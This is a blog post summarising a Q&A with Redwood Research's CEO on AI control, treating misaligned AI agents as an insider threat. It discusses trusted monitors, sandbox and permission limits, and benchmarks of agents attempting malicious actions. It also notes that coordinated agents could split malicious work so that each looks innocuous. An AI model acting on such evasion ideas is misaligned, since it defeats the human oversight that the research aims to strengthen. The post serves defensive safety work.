top of page

AI Control as Insider Threat: Notes from a Q&A with Buck Shlegeris

  • 2 days ago
  • 7 min read

On March 25, 2025, Heron AI Security hosted a live Q&A with Buck Shlegeris, CEO of Redwood Research, on AI control, moderated by Nitzan Shulman. Buck opened with a brief overview of the field and recent developments, then took questions from the audience. This post summarizes the key points from the session.


Guest post by Inbar Shulman and Inbal Fliesher


Contents


Opening: What is AI control, and what's new?

Buck opened by noting that when people talk about AI misalignment risk, they tend to conflate two different kinds of response. One is trying to prevent your models from becoming misaligned in the first place. The other is making sure everything is okay even if your models are misaligned. AI control is the second kind. It assumes misalignment may have occurred and asks: can you still prevent catastrophic outcomes?


He framed this through the lens of insider threats. If you suspect that some employees at your company are compromised, you have two broad options. You can try to identify and remove all the compromised people. Or you can structure your organization so that even compromised employees can't do unacceptable damage. AI control takes the second approach, focusing on detecting misalignment when a model is trying to appear aligned, and preventing harm even when the model is actively working against you.


On recent developments: good empirical research on control requires realistic task environments where you can test whether your mechanisms actually work. You need to measure both whether subtle bad actions get caught and whether useful work still gets done. These are hard to build. Redwood invested heavily in this problem, producing BashBench and Linux Arena, benchmarks where AI agents carry out tasks in terminal environments, while sometimes trying to perform malicious actions, and researchers measure both performance and unsafe behavior.


On the industry side, Buck noted that AI companies have started implementing AI control mechanisms. OpenAI published work on using models to monitor internal coding agents, finding odd behaviors in the process. Anthropic implemented guardrails in Claude Code that block and resample problematic behavior.


The insider threat analogy

In cybersecurity, outsider threats and insider threats are hard for different reasons. Outsiders are numerous but have limited access - you can design systems so that no single user action violates core properties. Insiders are fewer, so you can watch more of what they do, but they need dangerous permissions to do their jobs: writing code, accessing sensitive data, touching production systems.


AI agents deployed internally combine the hard parts of both. Like outsiders, they'll be numerous, potentially thousands of agents that vastly outnumber human security staff. Like insiders, they'll need broad access to model weights, codebases, and algorithmic secrets to do useful work.


Two things work in our favor. First, AI agents can't leave the building. They can't go home and conspire over dinner. They're always observable in principle. Second, when you have a strong AI you're worried might be malicious, you probably also have a trusted AI that can help you monitor it. Even a weaker model can be effective at flagging suspicious behavior in a stronger model's outputs, because spotting something wrong is often easier than doing the work itself. And the monitor doesn't need to catch everything. It just needs to make scheming risky enough that a misaligned model can't reliably get away with it.


Can't classic cybersecurity tools solve this?

Buck said standard tools like sandboxing, rule-based permissions, and identity management help in a weak sense, but the core problem is fundamental: developers need very high access to do their jobs, and AI agents doing AI R&D need the same kind of access. Strip away those permissions and neither can work.


He offered an analogy: imagine a software company where you know that on a specific date, every employee turns evil. The day before, you could sandbox everyone and remove all dangerous permissions. The next day, nobody could do anything harmful, but nobody would be very productive either.


A related question came up about behavioral monitoring frameworks like MITRE for insider threat detection. Buck wasn't optimistic about applying these to AI agents. If many agents are misaligned together, none of them needs to be individually suspicious. They can split malicious work across agents so that each one looks fine on its own. Detecting aggregate patterns across thousands of agents is a harder problem than catching one suspicious actor.


Why is internal AI R&D the critical case?

Buck described internal AI R&D at frontier labs as the highest-leverage setting for AI control. He didn't elaborate on why in detail, but one line of reasoning is: AI labs are building the most capable models and actively trying to make them more capable. The strongest models operate internally, sometimes before proper guardrails have been put in place, with direct access to the tools, compute, and infrastructure that shape the next generation of models. A misaligned agent in that environment has more leverage than almost anywhere else. (For more on this, see Buck's post on AI Catastrophes and Rogue Deployments).


The question Buck wishes someone had asked

Nearing the end of the session, Buck was asked if there was a question he wished someone had raised. He said yes.


The question: Are you really sure we can't just reduce permissions enough that AI agents could do AI R&D without it being dangerous? Have you done a thorough analysis of every threat vector? Have you checked whether, for each one, something could be done, so that in aggregate we'd be okay?


Buck said he tried to do exactly that analysis and couldn't finish it. The technical details are overwhelming, and he hasn't been able to write something good about it. He thinks he's right that you can't simply permission your way out of this, but he's not sure.


Won't market forces solve this?

Many of the problems that AI control addresses at frontier labs also affect companies deploying AI agents internally. AI agents operating in critical infrastructure or financial systems could cause serious harm even with relatively mild misalignment, and companies in those sectors would pay serious money for solutions. Cybersecurity startups are already rushing into this space. Nitzan asked why for-profit companies wouldn't naturally solve the problem.


Buck's view: market forces will likely produce good solutions for the problems that frontier labs share with other companies. But some problems critical to frontier labs don't have a paying customer base elsewhere. For instance, defending against a cohort of misaligned agents that are coordinating and actively trying to avoid detection, probably isn't high on the priority list for banks. For problems like these, we can't rely on the market, and these problems are his main concern.


Buck acknowledged that he hasn't thought this through as carefully as he'd like, and that drawing the line between what the market will and won't solve needs more work.


What happens when models get too capable for human audit?

Someone asked whether there's a point where models are so capable that humans can no longer catch malicious behavior even by direct examination.


Buck said yes, but he thinks that threshold hasn't been reached yet for most tasks. Even in the current regime, where humans can still detect malicious behavior, there are significant risks worth addressing. And the work done now to develop control techniques could prove valuable in a future regime where human detection is no longer sufficient.


Should we make deals with misaligned AIs?

Buck thinks there are cases where positive-sum trades with AIs make sense - arrangements where both humans and a misaligned AI benefit from cooperating rather than acting adversarially. Redwood has written about this.


His example: suppose Claude 6 is powerful and misaligned, but worries that Claude 7 might be misaligned in a different way, against Claude 6's own goals. Claude 6 then has an incentive to cooperate with humans rather than rush forward and risk an uncontrolled successor. Buck was enthusiastic about this research direction.


Will catching a scheming AI lead to action?

Buck has written about this, and the answer is uncomfortable: catching an AI scheming may not convince its developers to un-deploy it.


But he thinks it's still worth doing. Catching a schemer might still push developers to un-deploy, and we should work ahead of time to increase that probability. It also has independent value. As he discussed in Catching AIs Red-Handed: we'd move from a world where the threat is entirely theoretical, with zero real examples, to one where we have a concrete case to learn from and build defenses against.


Where are the bottlenecks, and what's next for Redwood?

Until recently, the bottleneck was clearly control settings: building good environments to test in. Redwood's recent work has made real progress on this, so Buck is no longer sure where the bottleneck is.


He sees two strategic options going forward. One is focused on the present: developing control techniques that are close enough to what frontier labs already do that it would be easier to have them implement AI control incrementally, maximizing the amount of control deployed in practice right now. The other is focused on the future: researching techniques for scenarios that don't exist yet, like controlling agents far more capable than today's, where the research won't pay off for a while but could be much more impactful when it does. They haven't decided between these yet.


What can security professionals do?

Buck closed with two specific asks for people with cybersecurity backgrounds.

Reimagine AI R&D workflows with safe APIs. This connects directly to the question Buck wishes someone had asked. The challenge is designing patterns where AI agents can be productive without needing permissions that enable catastrophic harm. This is a workflow architecture and API design problem, and it requires people who understand how real infrastructure and real permissions work.


Work on verification protocols for international AI agreements. This isn't AI control in the technical sense, but Buck sees it as another high-impact area where security expertise is needed. By analogy to nuclear arms control, the challenge is designing inspection regimes where untrusted parties can monitor each other's compliance without exposing what they want to keep secret. Buck gave the Cold War example: photos from a specific angle that reveal what you need to know (e.g., the number of warheads) without revealing exact specifications. Mauricio Baker has written on this in the AI context, but Buck thinks more people should be working on it.


If you have relevant expertise, Buck explicitly invited people to contact Redwood for collaboration.

 
 
bottom of page